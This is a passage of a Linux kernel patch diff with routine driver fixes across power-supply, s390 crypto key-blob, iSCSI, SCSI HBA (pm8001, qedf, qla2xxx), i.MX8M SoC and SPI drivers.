+@@ -1224,3 +1233,4 @@ MODULE_DESCRIPTION("Battery power supply driver for RK817 PMIC");
+ MODULE_AUTHOR("Maya Matuszczyk <maccraft123mc@gmail.com>");
+ MODULE_AUTHOR("Chris Morgan <macromorgan@hotmail.com>");
+ MODULE_LICENSE("GPL");
++MODULE_ALIAS("platform:rk817-charger");
+diff --git a/drivers/power/supply/ucs1002_power.c b/drivers/power/supply/ucs1002_power.c
+index ef673ec3db568..332cb50d9fb4f 100644
+--- a/drivers/power/supply/ucs1002_power.c
++++ b/drivers/power/supply/ucs1002_power.c
+@@ -384,7 +384,8 @@ static int ucs1002_get_property(struct power_supply *psy,
+ 	case POWER_SUPPLY_PROP_USB_TYPE:
+ 		return ucs1002_get_usb_type(info, val);
+ 	case POWER_SUPPLY_PROP_HEALTH:
+-		return val->intval = info->health;
++		val->intval = info->health;
++		return 0;
+ 	case POWER_SUPPLY_PROP_PRESENT:
+ 		val->intval = info->present;
+ 		return 0;
+diff --git a/drivers/s390/crypto/pkey_api.c b/drivers/s390/crypto/pkey_api.c
+index 2b92ec20ed68e..df0f19e6d9235 100644
+--- a/drivers/s390/crypto/pkey_api.c
++++ b/drivers/s390/crypto/pkey_api.c
+@@ -212,7 +212,8 @@ static int pkey_clr2ep11key(const u8 *clrkey, size_t clrkeylen,
+ 		card = apqns[i] >> 16;
+ 		dom = apqns[i] & 0xFFFF;
+ 		rc = ep11_clr2keyblob(card, dom, clrkeylen * 8,
+-				      0, clrkey, keybuf, keybuflen);
++				      0, clrkey, keybuf, keybuflen,
++				      PKEY_TYPE_EP11);
+ 		if (rc == 0)
+ 			break;
+ 	}
+@@ -627,6 +628,11 @@ static int pkey_clr2seckey2(const struct pkey_apqn *apqns, size_t nr_apqns,
+ 		if (*keybufsize < MINEP11AESKEYBLOBSIZE)
+ 			return -EINVAL;
+ 		break;
++	case PKEY_TYPE_EP11_AES:
++		if (*keybufsize < (sizeof(struct ep11kblob_header) +
++				   MINEP11AESKEYBLOBSIZE))
++			return -EINVAL;
++		break;
+ 	default:
+ 		return -EINVAL;
+ 	}
+@@ -645,9 +651,11 @@ static int pkey_clr2seckey2(const struct pkey_apqn *apqns, size_t nr_apqns,
+ 	for (i = 0, rc = -ENODEV; i < nr_apqns; i++) {
+ 		card = apqns[i].card;
+ 		dom = apqns[i].domain;
+-		if (ktype == PKEY_TYPE_EP11) {
++		if (ktype == PKEY_TYPE_EP11 ||
++		    ktype == PKEY_TYPE_EP11_AES) {
+ 			rc = ep11_clr2keyblob(card, dom, ksize, kflags,
+-					      clrkey, keybuf, keybufsize);
++					      clrkey, keybuf, keybufsize,
++					      ktype);
+ 		} else if (ktype == PKEY_TYPE_CCA_DATA) {
+ 			rc = cca_clr2seckey(card, dom, ksize,
+ 					    clrkey, keybuf);
+@@ -1361,7 +1369,7 @@ static long pkey_unlocked_ioctl(struct file *filp, unsigned int cmd,
+ 		apqns = _copy_apqns_from_user(kcs.apqns, kcs.apqn_entries);
+ 		if (IS_ERR(apqns))
+ 			return PTR_ERR(apqns);
+-		kkey = kmalloc(klen, GFP_KERNEL);
++		kkey = kzalloc(klen, GFP_KERNEL);
+ 		if (!kkey) {
+ 			kfree(apqns);
+ 			return -ENOMEM;
+diff --git a/drivers/s390/crypto/zcrypt_ep11misc.c b/drivers/s390/crypto/zcrypt_ep11misc.c
+index 20bbeec1a1a22..77e1ffaafaea1 100644
+--- a/drivers/s390/crypto/zcrypt_ep11misc.c
++++ b/drivers/s390/crypto/zcrypt_ep11misc.c
+@@ -1000,12 +1000,12 @@ out:
+ 	return rc;
+ }
+ 
+-static int ep11_unwrapkey(u16 card, u16 domain,
+-			  const u8 *kek, size_t keksize,
+-			  const u8 *enckey, size_t enckeysize,
+-			  u32 mech, const u8 *iv,
+-			  u32 keybitsize, u32 keygenflags,
+-			  u8 *keybuf, size_t *keybufsize)
++static int _ep11_unwrapkey(u16 card, u16 domain,
++			   const u8 *kek, size_t keksize,
++			   const u8 *enckey, size_t enckeysize,
++			   u32 mech, const u8 *iv,
++			   u32 keybitsize, u32 keygenflags,
++			   u8 *keybuf, size_t *keybufsize)
+ {
+ 	struct uw_req_pl {
+ 		struct pl_head head;
+@@ -1042,7 +1042,6 @@ static int ep11_unwrapkey(u16 card, u16 domain,
+ 	struct ep11_cprb *req = NULL, *rep = NULL;
+ 	struct ep11_target_dev target;
+ 	struct ep11_urb *urb = NULL;
+-	struct ep11keyblob *kb;
+ 	size_t req_pl_size;
+ 	int api, rc = -ENOMEM;
+ 	u8 *p;
+@@ -1124,14 +1123,9 @@ static int ep11_unwrapkey(u16 card, u16 domain,
+ 		goto out;
+ 	}
+ 
+-	/* copy key blob and set header values */
++	/* copy key blob */
+ 	memcpy(keybuf, rep_pl->data, rep_pl->data_len);
+ 	*keybufsize = rep_pl->data_len;
+-	kb = (struct ep11keyblob *)keybuf;
+-	kb->head.type = TOKTYPE_NON_CCA;
+-	kb->head.len = rep_pl->data_len;
+-	kb->head.version = TOKVER_EP11_AES;
+-	kb->head.bitlen = keybitsize;
+ 
+ out:
+ 	kfree(req);
+@@ -1140,6 +1134,42 @@ out:
+ 	return rc;
+ }
+ 
++static int ep11_unwrapkey(u16 card, u16 domain,
++			  const u8 *kek, size_t keksize,
++			  const u8 *enckey, size_t enckeysize,
++			  u32 mech, const u8 *iv,
++			  u32 keybitsize, u32 keygenflags,
++			  u8 *keybuf, size_t *keybufsize,
++			  u8 keybufver)
++{
++	struct ep11kblob_header *hdr;
++	size_t hdr_size, pl_size;
++	u8 *pl;
++	int rc;
++
++	rc = ep11_kb_split(keybuf, *keybufsize, keybufver,
++			   &hdr, &hdr_size, &pl, &pl_size);
++	if (rc)
++		return rc;
++
++	rc = _ep11_unwrapkey(card, domain, kek, keksize, enckey, enckeysize,
++			     mech, iv, keybitsize, keygenflags,
++			     pl, &pl_size);
++	if (rc)
++		return rc;
++
++	*keybufsize = hdr_size + pl_size;
++
++	/* update header information */
++	hdr = (struct ep11kblob_header *)keybuf;
++	hdr->type = TOKTYPE_NON_CCA;
++	hdr->len = *keybufsize;
++	hdr->version = keybufver;
++	hdr->bitlen = keybitsize;
++
++	return 0;
++}
++
+ static int ep11_wrapkey(u16 card, u16 domain,
+ 			const u8 *key, size_t keysize,
+ 			u32 mech, const u8 *iv,
+@@ -1274,7 +1304,8 @@ out:
+ }
+ 
+ int ep11_clr2keyblob(u16 card, u16 domain, u32 keybitsize, u32 keygenflags,
+-		     const u8 *clrkey, u8 *keybuf, size_t *keybufsize)
++		     const u8 *clrkey, u8 *keybuf, size_t *keybufsize,
++		     u32 keytype)
+ {
+ 	int rc;
+ 	u8 encbuf[64], *kek = NULL;
+@@ -1321,7 +1352,7 @@ int ep11_clr2keyblob(u16 card, u16 domain, u32 keybitsize, u32 keygenflags,
+ 	/* Step 3: import the encrypted key value as a new key */
+ 	rc = ep11_unwrapkey(card, domain, kek, keklen,
+ 			    encbuf, encbuflen, 0, def_iv,
+-			    keybitsize, 0, keybuf, keybufsize);
++			    keybitsize, 0, keybuf, keybufsize, keytype);
+ 	if (rc) {
+ 		DEBUG_ERR(
+ 			"%s importing key value as new key failed,, rc=%d\n",
+diff --git a/drivers/s390/crypto/zcrypt_ep11misc.h b/drivers/s390/crypto/zcrypt_ep11misc.h
+index ed328c354bade..b7f9cbe3d58de 100644
+--- a/drivers/s390/crypto/zcrypt_ep11misc.h
++++ b/drivers/s390/crypto/zcrypt_ep11misc.h
+@@ -113,7 +113,8 @@ int ep11_genaeskey(u16 card, u16 domain, u32 keybitsize, u32 keygenflags,
+  * Generate EP11 AES secure key with given clear key value.
+  */
+ int ep11_clr2keyblob(u16 cardnr, u16 domain, u32 keybitsize, u32 keygenflags,
+-		     const u8 *clrkey, u8 *keybuf, size_t *keybufsize);
++		     const u8 *clrkey, u8 *keybuf, size_t *keybufsize,
++		     u32 keytype);
+ 
+ /*
+  * Build a list of ep11 apqns meeting the following constrains:
+diff --git a/drivers/scsi/iscsi_tcp.c b/drivers/scsi/iscsi_tcp.c
+index 8009eab3b7bee..56ade46309707 100644
+--- a/drivers/scsi/iscsi_tcp.c
++++ b/drivers/scsi/iscsi_tcp.c
+@@ -724,6 +724,10 @@ iscsi_sw_tcp_conn_bind(struct iscsi_cls_session *cls_session,
+ 		return -EEXIST;
+ 	}
+ 
++	err = -EINVAL;
++	if (!sk_is_tcp(sock->sk))
++		goto free_socket;
++
+ 	err = iscsi_conn_bind(cls_session, cls_conn, is_leading);
+ 	if (err)
+ 		goto free_socket;
+diff --git a/drivers/scsi/pm8001/pm8001_hwi.c b/drivers/scsi/pm8001/pm8001_hwi.c
+index 628b08ba6770b..e2c52c2d00b33 100644
+--- a/drivers/scsi/pm8001/pm8001_hwi.c
++++ b/drivers/scsi/pm8001/pm8001_hwi.c
+@@ -4313,7 +4313,7 @@ pm8001_chip_phy_start_req(struct pm8001_hba_info *pm8001_ha, u8 phy_id)
+ 	payload.sas_identify.dev_type = SAS_END_DEVICE;
+ 	payload.sas_identify.initiator_bits = SAS_PROTOCOL_ALL;
+ 	memcpy(payload.sas_identify.sas_addr,
+-		pm8001_ha->sas_addr, SAS_ADDR_SIZE);
++		&pm8001_ha->phy[phy_id].dev_sas_addr, SAS_ADDR_SIZE);
+ 	payload.sas_identify.phy_id = phy_id;
+ 
+ 	return pm8001_mpi_build_cmd(pm8001_ha, 0, opcode, &payload,
+diff --git a/drivers/scsi/pm8001/pm80xx_hwi.c b/drivers/scsi/pm8001/pm80xx_hwi.c
+index f8b8624458f73..2bf293e8f7472 100644
+--- a/drivers/scsi/pm8001/pm80xx_hwi.c
++++ b/drivers/scsi/pm8001/pm80xx_hwi.c
+@@ -3750,10 +3750,12 @@ static int mpi_set_controller_config_resp(struct pm8001_hba_info *pm8001_ha,
+ 			(struct set_ctrl_cfg_resp *)(piomb + 4);
+ 	u32 status = le32_to_cpu(pPayload->status);
+ 	u32 err_qlfr_pgcd = le32_to_cpu(pPayload->err_qlfr_pgcd);
++	u32 tag = le32_to_cpu(pPayload->tag);
+ 
+ 	pm8001_dbg(pm8001_ha, MSG,
+ 		   "SET CONTROLLER RESP: status 0x%x qlfr_pgcd 0x%x\n",
+ 		   status, err_qlfr_pgcd);
++	pm8001_tag_free(pm8001_ha, tag);
+ 
+ 	return 0;
+ }
+@@ -4803,7 +4805,7 @@ pm80xx_chip_phy_start_req(struct pm8001_hba_info *pm8001_ha, u8 phy_id)
+ 	payload.sas_identify.dev_type = SAS_END_DEVICE;
+ 	payload.sas_identify.initiator_bits = SAS_PROTOCOL_ALL;
+ 	memcpy(payload.sas_identify.sas_addr,
+-	  &pm8001_ha->sas_addr, SAS_ADDR_SIZE);
++		&pm8001_ha->phy[phy_id].dev_sas_addr, SAS_ADDR_SIZE);
+ 	payload.sas_identify.phy_id = phy_id;
+ 
+ 	return pm8001_mpi_build_cmd(pm8001_ha, 0, opcode, &payload,
+diff --git a/drivers/scsi/qedf/qedf_io.c b/drivers/scsi/qedf/qedf_io.c
+index 4750ec5789a80..10fe3383855c0 100644
+--- a/drivers/scsi/qedf/qedf_io.c
++++ b/drivers/scsi/qedf/qedf_io.c
+@@ -1904,6 +1904,7 @@ int qedf_initiate_abts(struct qedf_ioreq *io_req, bool return_scsi_cmd_on_abts)
+ 		goto drop_rdata_kref;
+ 	}
+ 
++	spin_lock_irqsave(&fcport->rport_lock, flags);
+ 	if (!test_bit(QEDF_CMD_OUTSTANDING, &io_req->flags) ||
+ 	    test_bit(QEDF_CMD_IN_CLEANUP, &io_req->flags) ||
+ 	    test_bit(QEDF_CMD_IN_ABORT, &io_req->flags)) {
+@@ -1911,17 +1912,20 @@ int qedf_initiate_abts(struct qedf_ioreq *io_req, bool return_scsi_cmd_on_abts)
+ 			 "io_req xid=0x%x sc_cmd=%p already in cleanup or abort processing or already completed.\n",
+ 			 io_req->xid, io_req->sc_cmd);
+ 		rc = 1;
++		spin_unlock_irqrestore(&fcport->rport_lock, flags);
+ 		goto drop_rdata_kref;
+ 	}
+ 
++	/* Set the command type to abort */
++	io_req->cmd_type = QEDF_ABTS;
++	spin_unlock_irqrestore(&fcport->rport_lock, flags);
++
+ 	kref_get(&io_req->refcount);
+ 
+ 	xid = io_req->xid;
+ 	qedf->control_requests++;
+ 	qedf->packet_aborts++;
+ 
+-	/* Set the command type to abort */
+-	io_req->cmd_type = QEDF_ABTS;
+ 	io_req->return_scsi_cmd_on_abts = return_scsi_cmd_on_abts;
+ 
+ 	set_bit(QEDF_CMD_IN_ABORT, &io_req->flags);
+@@ -2210,7 +2214,9 @@ process_els:
+ 		  refcount, fcport, fcport->rdata->ids.port_id);
+ 
+ 	/* Cleanup cmds re-use the same TID as the original I/O */
++	spin_lock_irqsave(&fcport->rport_lock, flags);
+ 	io_req->cmd_type = QEDF_CLEANUP;
++	spin_unlock_irqrestore(&fcport->rport_lock, flags);
+ 	io_req->return_scsi_cmd_on_abts = return_scsi_cmd_on_abts;
+ 
+ 	init_completion(&io_req->cleanup_done);
+diff --git a/drivers/scsi/qedf/qedf_main.c b/drivers/scsi/qedf/qedf_main.c
+index c4f293d39f228..d969b0dc97326 100644
+--- a/drivers/scsi/qedf/qedf_main.c
++++ b/drivers/scsi/qedf/qedf_main.c
+@@ -2807,6 +2807,8 @@ void qedf_process_cqe(struct qedf_ctx *qedf, struct fcoe_cqe *cqe)
+ 	struct qedf_ioreq *io_req;
+ 	struct qedf_rport *fcport;
+ 	u32 comp_type;
++	u8 io_comp_type;
++	unsigned long flags;
+ 
+ 	comp_type = (cqe->cqe_data >> FCOE_CQE_CQE_TYPE_SHIFT) &
+ 	    FCOE_CQE_CQE_TYPE_MASK;
+@@ -2840,11 +2842,14 @@ void qedf_process_cqe(struct qedf_ctx *qedf, struct fcoe_cqe *cqe)
+ 		return;
+ 	}
+ 
++	spin_lock_irqsave(&fcport->rport_lock, flags);
++	io_comp_type = io_req->cmd_type;
++	spin_unlock_irqrestore(&fcport->rport_lock, flags);
+ 
+ 	switch (comp_type) {
+ 	case FCOE_GOOD_COMPLETION_CQE_TYPE:
+ 		atomic_inc(&fcport->free_sqes);
+-		switch (io_req->cmd_type) {
++		switch (io_comp_type) {
+ 		case QEDF_SCSI_CMD:
+ 			qedf_scsi_completion(qedf, cqe, io_req);
+ 			break;
+diff --git a/drivers/scsi/qla2xxx/qla_def.h b/drivers/scsi/qla2xxx/qla_def.h
+index 7d282906598f3..1713588f671f3 100644
+--- a/drivers/scsi/qla2xxx/qla_def.h
++++ b/drivers/scsi/qla2xxx/qla_def.h
+@@ -3475,6 +3475,7 @@ struct qla_msix_entry {
+ 	int have_irq;
+ 	int in_use;
+ 	uint32_t vector;
++	uint32_t vector_base0;
+ 	uint16_t entry;
+ 	char name[30];
+ 	void *handle;
+@@ -3804,6 +3805,7 @@ struct qla_qpair {
+ 	uint64_t retry_term_jiff;
+ 	struct qla_tgt_counters tgt_counters;
+ 	uint16_t cpuid;
++	bool cpu_mapped;
+ 	struct qla_fw_resources fwres ____cacheline_aligned;
+ 	u32	cmd_cnt;
+ 	u32	cmd_completion_cnt;
+@@ -4133,6 +4135,7 @@ struct qla_hw_data {
+ 	struct req_que **req_q_map;
+ 	struct rsp_que **rsp_q_map;
+ 	struct qla_qpair **queue_pair_map;
++	struct qla_qpair **qp_cpu_map;
+ 	unsigned long req_qid_map[(QLA_MAX_QUEUES / 8) / sizeof(unsigned long)];
+ 	unsigned long rsp_qid_map[(QLA_MAX_QUEUES / 8) / sizeof(unsigned long)];
+ 	unsigned long qpair_qid_map[(QLA_MAX_QUEUES / 8)
+diff --git a/drivers/scsi/qla2xxx/qla_init.c b/drivers/scsi/qla2xxx/qla_init.c
+index 36abdb0de1694..884ed77259f85 100644
+--- a/drivers/scsi/qla2xxx/qla_init.c
++++ b/drivers/scsi/qla2xxx/qla_init.c
+@@ -9758,8 +9758,9 @@ struct qla_qpair *qla2xxx_create_qpair(struct scsi_qla_host *vha, int qos,
+ 		qpair->req = ha->req_q_map[req_id];
+ 		qpair->rsp->req = qpair->req;
+ 		qpair->rsp->qpair = qpair;
+-		/* init qpair to this cpu. Will adjust at run time. */
+-		qla_cpu_update(qpair, raw_smp_processor_id());
++
++		if (!qpair->cpu_mapped)
++			qla_cpu_update(qpair, raw_smp_processor_id());
+ 
+ 		if (IS_T10_PI_CAPABLE(ha) && ql2xenabledif) {
+ 			if (ha->fw_attributes & BIT_4)
+diff --git a/drivers/scsi/qla2xxx/qla_inline.h b/drivers/scsi/qla2xxx/qla_inline.h
+index a7b5d11146827..a4a56ab0ba747 100644
+--- a/drivers/scsi/qla2xxx/qla_inline.h
++++ b/drivers/scsi/qla2xxx/qla_inline.h
+@@ -573,3 +573,61 @@ fcport_is_bigger(fc_port_t *fcport)
+ {
+ 	return !fcport_is_smaller(fcport);
+ }
++
++static inline struct qla_qpair *
++qla_mapq_nvme_select_qpair(struct qla_hw_data *ha, struct qla_qpair *qpair)
++{
++	int cpuid = raw_smp_processor_id();
++
++	if (qpair->cpuid != cpuid &&
++	    ha->qp_cpu_map[cpuid]) {
++		qpair = ha->qp_cpu_map[cpuid];
++	}
++	return qpair;
++}
++
++static inline void
++qla_mapq_init_qp_cpu_map(struct qla_hw_data *ha,
++			 struct qla_msix_entry *msix,
++			 struct qla_qpair *qpair)
++{
++	const struct cpumask *mask;
++	unsigned int cpu;
++
++	if (!ha->qp_cpu_map)
++		return;
++	mask = pci_irq_get_affinity(ha->pdev, msix->vector_base0);
++	if (!mask)
++		return;
++	qpair->cpuid = cpumask_first(mask);
++	for_each_cpu(cpu, mask) {
++		ha->qp_cpu_map[cpu] = qpair;
++	}
++	msix->cpuid = qpair->cpuid;
++	qpair->cpu_mapped = true;
++}
++
++static inline void
++qla_mapq_free_qp_cpu_map(struct qla_hw_data *ha)
++{
++	if (ha->qp_cpu_map) {
++		kfree(ha->qp_cpu_map);
++		ha->qp_cpu_map = NULL;
++	}
++}
++
++static inline int qla_mapq_alloc_qp_cpu_map(struct qla_hw_data *ha)
++{
++	scsi_qla_host_t *vha = pci_get_drvdata(ha->pdev);
++
++	if (!ha->qp_cpu_map) {
++		ha->qp_cpu_map = kcalloc(NR_CPUS, sizeof(struct qla_qpair *),
++					 GFP_KERNEL);
++		if (!ha->qp_cpu_map) {
++			ql_log(ql_log_fatal, vha, 0x0180,
++			       "Unable to allocate memory for qp_cpu_map ptrs.\n");
++			return -1;
++		}
++	}
++	return 0;
++}
+diff --git a/drivers/scsi/qla2xxx/qla_isr.c b/drivers/scsi/qla2xxx/qla_isr.c
+index 0111249cc8774..db65dbab3a9fa 100644
+--- a/drivers/scsi/qla2xxx/qla_isr.c
++++ b/drivers/scsi/qla2xxx/qla_isr.c
+@@ -3817,9 +3817,11 @@ void qla24xx_process_response_queue(struct scsi_qla_host *vha,
+ 	if (!ha->flags.fw_started)
+ 		return;
+ 
+-	if (rsp->qpair->cpuid != smp_processor_id() || !rsp->qpair->rcv_intr) {
++	if (rsp->qpair->cpuid != raw_smp_processor_id() || !rsp->qpair->rcv_intr) {
+ 		rsp->qpair->rcv_intr = 1;
+-		qla_cpu_update(rsp->qpair, smp_processor_id());
++
++		if (!rsp->qpair->cpu_mapped)
++			qla_cpu_update(rsp->qpair, raw_smp_processor_id());
+ 	}
+ 
+ #define __update_rsp_in(_is_shadow_hba, _rsp, _rsp_in)			\
+@@ -4306,7 +4308,7 @@ qla2xxx_msix_rsp_q(int irq, void *dev_id)
+ 	}
+ 	ha = qpair->hw;
+ 
+-	queue_work_on(smp_processor_id(), ha->wq, &qpair->q_work);
++	queue_work(ha->wq, &qpair->q_work);
+ 
+ 	return IRQ_HANDLED;
+ }
+@@ -4332,7 +4334,7 @@ qla2xxx_msix_rsp_q_hs(int irq, void *dev_id)
+ 	wrt_reg_dword(&reg->hccr, HCCRX_CLR_RISC_INT);
+ 	spin_unlock_irqrestore(&ha->hardware_lock, flags);
+ 
+-	queue_work_on(smp_processor_id(), ha->wq, &qpair->q_work);
++	queue_work(ha->wq, &qpair->q_work);
+ 
+ 	return IRQ_HANDLED;
+ }
+@@ -4425,6 +4427,7 @@ qla24xx_enable_msix(struct qla_hw_data *ha, struct rsp_que *rsp)
+ 	for (i = 0; i < ha->msix_count; i++) {
+ 		qentry = &ha->msix_entries[i];
+ 		qentry->vector = pci_irq_vector(ha->pdev, i);
++		qentry->vector_base0 = i;
+ 		qentry->entry = i;
+ 		qentry->have_irq = 0;
+ 		qentry->in_use = 0;
+@@ -4652,5 +4655,6 @@ int qla25xx_request_irq(struct qla_hw_data *ha, struct qla_qpair *qpair,
+ 	}
+ 	msix->have_irq = 1;
+ 	msix->handle = qpair;
++	qla_mapq_init_qp_cpu_map(ha, msix, qpair);
+ 	return ret;
+ }
+diff --git a/drivers/scsi/qla2xxx/qla_nvme.c b/drivers/scsi/qla2xxx/qla_nvme.c
+index c9a6fc882a801..9941b38eac93c 100644
+--- a/drivers/scsi/qla2xxx/qla_nvme.c
++++ b/drivers/scsi/qla2xxx/qla_nvme.c
+@@ -609,6 +609,7 @@ static int qla_nvme_post_cmd(struct nvme_fc_local_port *lport,
+ 	fc_port_t *fcport;
+ 	struct srb_iocb *nvme;
+ 	struct scsi_qla_host *vha;
++	struct qla_hw_data *ha;
+ 	int rval;
+ 	srb_t *sp;
+ 	struct qla_qpair *qpair = hw_queue_handle;
+@@ -629,6 +630,7 @@ static int qla_nvme_post_cmd(struct nvme_fc_local_port *lport,
+ 		return -ENODEV;
+ 
+ 	vha = fcport->vha;
++	ha = vha->hw;
+ 
+ 	if (test_bit(ABORT_ISP_ACTIVE, &vha->dpc_flags))
+ 		return -EBUSY;
+@@ -643,6 +645,8 @@ static int qla_nvme_post_cmd(struct nvme_fc_local_port *lport,
+ 	if (fcport->nvme_flag & NVME_FLAG_RESETTING)
+ 		return -EBUSY;
+ 
++	qpair = qla_mapq_nvme_select_qpair(ha, qpair);
++
+ 	/* Alloc SRB structure */
+ 	sp = qla2xxx_get_qpair_sp(vha, qpair, fcport, GFP_ATOMIC);
+ 	if (!sp)
+diff --git a/drivers/scsi/qla2xxx/qla_os.c b/drivers/scsi/qla2xxx/qla_os.c
+index 78f7cd16967fa..b33ffec1cb75e 100644
+--- a/drivers/scsi/qla2xxx/qla_os.c
++++ b/drivers/scsi/qla2xxx/qla_os.c
+@@ -480,6 +480,11 @@ static int qla2x00_alloc_queues(struct qla_hw_data *ha, struct req_que *req,
+ 			    "Unable to allocate memory for queue pair ptrs.\n");
+ 			goto fail_qpair_map;
+ 		}
++		if (qla_mapq_alloc_qp_cpu_map(ha) != 0) {
++			kfree(ha->queue_pair_map);
++			ha->queue_pair_map = NULL;
++			goto fail_qpair_map;
++		}
+ 	}
+ 
+ 	/*
+@@ -554,6 +559,7 @@ static void qla2x00_free_queues(struct qla_hw_data *ha)
+ 		ha->base_qpair = NULL;
+ 	}
+ 
++	qla_mapq_free_qp_cpu_map(ha);
+ 	spin_lock_irqsave(&ha->hardware_lock, flags);
+ 	for (cnt = 0; cnt < ha->max_req_queues; cnt++) {
+ 		if (!test_bit(cnt, ha->req_qid_map))
+diff --git a/drivers/scsi/qla2xxx/qla_target.c b/drivers/scsi/qla2xxx/qla_target.c
+index 545473a0ffc84..5a5beb41786ed 100644
+--- a/drivers/scsi/qla2xxx/qla_target.c
++++ b/drivers/scsi/qla2xxx/qla_target.c
+@@ -4442,8 +4442,7 @@ static int qlt_handle_cmd_for_atio(struct scsi_qla_host *vha,
+ 		queue_work_on(cmd->se_cmd.cpuid, qla_tgt_wq, &cmd->work);
+ 	} else if (ha->msix_count) {
+ 		if (cmd->atio.u.isp24.fcp_cmnd.rddata)
+-			queue_work_on(smp_processor_id(), qla_tgt_wq,
+-			    &cmd->work);
++			queue_work(qla_tgt_wq, &cmd->work);
+ 		else
+ 			queue_work_on(cmd->se_cmd.cpuid, qla_tgt_wq,
+ 			    &cmd->work);
+diff --git a/drivers/scsi/qla2xxx/tcm_qla2xxx.c b/drivers/scsi/qla2xxx/tcm_qla2xxx.c
+index 8fa0056b56ddb..e54ee6770e79f 100644
+--- a/drivers/scsi/qla2xxx/tcm_qla2xxx.c
++++ b/drivers/scsi/qla2xxx/tcm_qla2xxx.c
+@@ -310,7 +310,7 @@ static void tcm_qla2xxx_free_cmd(struct qla_tgt_cmd *cmd)
+ 	cmd->trc_flags |= TRC_CMD_DONE;
+ 
+ 	INIT_WORK(&cmd->work, tcm_qla2xxx_complete_free);
+-	queue_work_on(smp_processor_id(), tcm_qla2xxx_free_wq, &cmd->work);
++	queue_work(tcm_qla2xxx_free_wq, &cmd->work);
+ }
+ 
+ /*
+@@ -557,7 +557,7 @@ static void tcm_qla2xxx_handle_data(struct qla_tgt_cmd *cmd)
+ 	cmd->trc_flags |= TRC_DATA_IN;
+ 	cmd->cmd_in_wq = 1;
+ 	INIT_WORK(&cmd->work, tcm_qla2xxx_handle_data_work);
+-	queue_work_on(smp_processor_id(), tcm_qla2xxx_free_wq, &cmd->work);
++	queue_work(tcm_qla2xxx_free_wq, &cmd->work);
+ }
+ 
+ static int tcm_qla2xxx_chk_dif_tags(uint32_t tag)
+diff --git a/drivers/soc/imx/soc-imx8m.c b/drivers/soc/imx/soc-imx8m.c
+index 32ed9dc88e455..08197b03955dd 100644
+--- a/drivers/soc/imx/soc-imx8m.c
++++ b/drivers/soc/imx/soc-imx8m.c
+@@ -100,6 +100,7 @@ static void __init imx8mm_soc_uid(void)
+ {
+ 	void __iomem *ocotp_base;
+ 	struct device_node *np;
++	struct clk *clk;
+ 	u32 offset = of_machine_is_compatible("fsl,imx8mp") ?
+ 		     IMX8MP_OCOTP_UID_OFFSET : 0;
+ 
+@@ -109,11 +110,20 @@ static void __init imx8mm_soc_uid(void)
+ 
+ 	ocotp_base = of_iomap(np, 0);
+ 	WARN_ON(!ocotp_base);
++	clk = of_clk_get_by_name(np, NULL);
++	if (IS_ERR(clk)) {
++		WARN_ON(IS_ERR(clk));
++		return;
++	}
++
++	clk_prepare_enable(clk);
+ 
+ 	soc_uid = readl_relaxed(ocotp_base + OCOTP_UID_HIGH + offset);
+ 	soc_uid <<= 32;
+ 	soc_uid |= readl_relaxed(ocotp_base + OCOTP_UID_LOW + offset);
+ 
++	clk_disable_unprepare(clk);
++	clk_put(clk);
+ 	iounmap(ocotp_base);
+ 	of_node_put(np);
+ }
+diff --git a/drivers/spi/spi-gxp.c b/drivers/spi/spi-gxp.c
+index c900c2f39b578..21b07e2518513 100644
+--- a/drivers/spi/spi-gxp.c
++++ b/drivers/spi/spi-gxp.c
+@@ -195,7 +195,7 @@ static ssize_t gxp_spi_write(struct gxp_spi_chip *chip, const struct spi_mem_op
+ 		return ret;
+ 	}
+ 
+-	return write_len;
++	return 0;
+ }
+ 
+ static int do_gxp_exec_mem_op(struct spi_mem *mem, const struct spi_mem_op *op)
+diff --git a/drivers/spi/spi-intel-pci.c b/drivers/spi/spi-intel-pci.c
+index f0d532ea40e82..b718a74fa3edc 100644
+--- a/drivers/spi/spi-intel-pci.c
++++ b/drivers/spi/spi-intel-pci.c
+@@ -72,6 +72,7 @@ static const struct pci_device_id intel_spi_pci_ids[] = {
+ 	{ PCI_VDEVICE(INTEL, 0x4da4), (unsigned long)&bxt_info },
+ 	{ PCI_VDEVICE(INTEL, 0x51a4), (unsigned long)&cnl_info },
+ 	{ PCI_VDEVICE(INTEL, 0x54a4), (unsigned long)&cnl_info },
++	{ PCI_VDEVICE(INTEL, 0x5794), (unsigned long)&cnl_info },
+ 	{ PCI_VDEVICE(INTEL, 0x7a24), (unsigned long)&cnl_info },
+ 	{ PCI_VDEVICE(INTEL, 0x7aa4), (unsigned long)&cnl_info },
+ 	{ PCI_VDEVICE(INTEL, 0x7e23), (unsigned long)&cnl_info },
+diff --git a/drivers/spi/spi-nxp-fspi.c b/drivers/spi/spi-nxp-fspi.c
+index d6a65a989ef80..c7a4a3606547e 100644
+--- a/drivers/spi/spi-nxp-fspi.c
++++ b/drivers/spi/spi-nxp-fspi.c
+@@ -1029,6 +1029,13 @@ static int nxp_fspi_default_setup(struct nxp_fspi *f)
+ 	fspi_writel(f, FSPI_AHBCR_PREF_EN | FSPI_AHBCR_RDADDROPT,
+ 		 base + FSPI_AHBCR);
+ 
++	/* Reset the FLSHxCR1 registers. */
++	reg = FSPI_FLSHXCR1_TCSH(0x3) | FSPI_FLSHXCR1_TCSS(0x3);
++	fspi_writel(f, reg, base + FSPI_FLSHA1CR1);
++	fspi_writel(f, reg, base + FSPI_FLSHA2CR1);
++	fspi_writel(f, reg, base + FSPI_FLSHB1CR1);
++	fspi_writel(f, reg, base + FSPI_FLSHB2CR1);
++
+ 	/* AHB Read - Set lut sequence ID for all CS. */
+ 	fspi_writel(f, SEQID_LUT, base + FSPI_FLSHA1CR2);
+ 	fspi_writel(f, SEQID_LUT, base + FSPI_FLSHA2CR2);
+diff --git a/drivers/spi/spi-stm32.c b/drivers/spi/spi-stm32.c
+index def09cf0dc147..12241815510d4 100644
+--- a/drivers/spi/spi-stm32.c
++++ b/drivers/spi/spi-stm32.c
+@@ -268,6 +268,7 @@ struct stm32_spi_cfg {
+  * @fifo_size: size of the embedded fifo in bytes
+  * @cur_midi: master inter-data idleness in ns
+  * @cur_speed: speed configured in Hz
++ * @cur_half_period: time of a half bit in us
+  * @cur_bpw: number of bits in a single SPI data frame
+  * @cur_fthlv: fifo threshold level (data frames in a single data packet)
+  * @cur_comm: SPI communication mode
+@@ -294,6 +295,7 @@ struct stm32_spi {
+ 
+ 	unsigned int cur_midi;
+ 	unsigned int cur_speed;
++	unsigned int cur_half_period;
+ 	unsigned int cur_bpw;
+ 	unsigned int cur_fthlv;
+ 	unsigned int cur_comm;
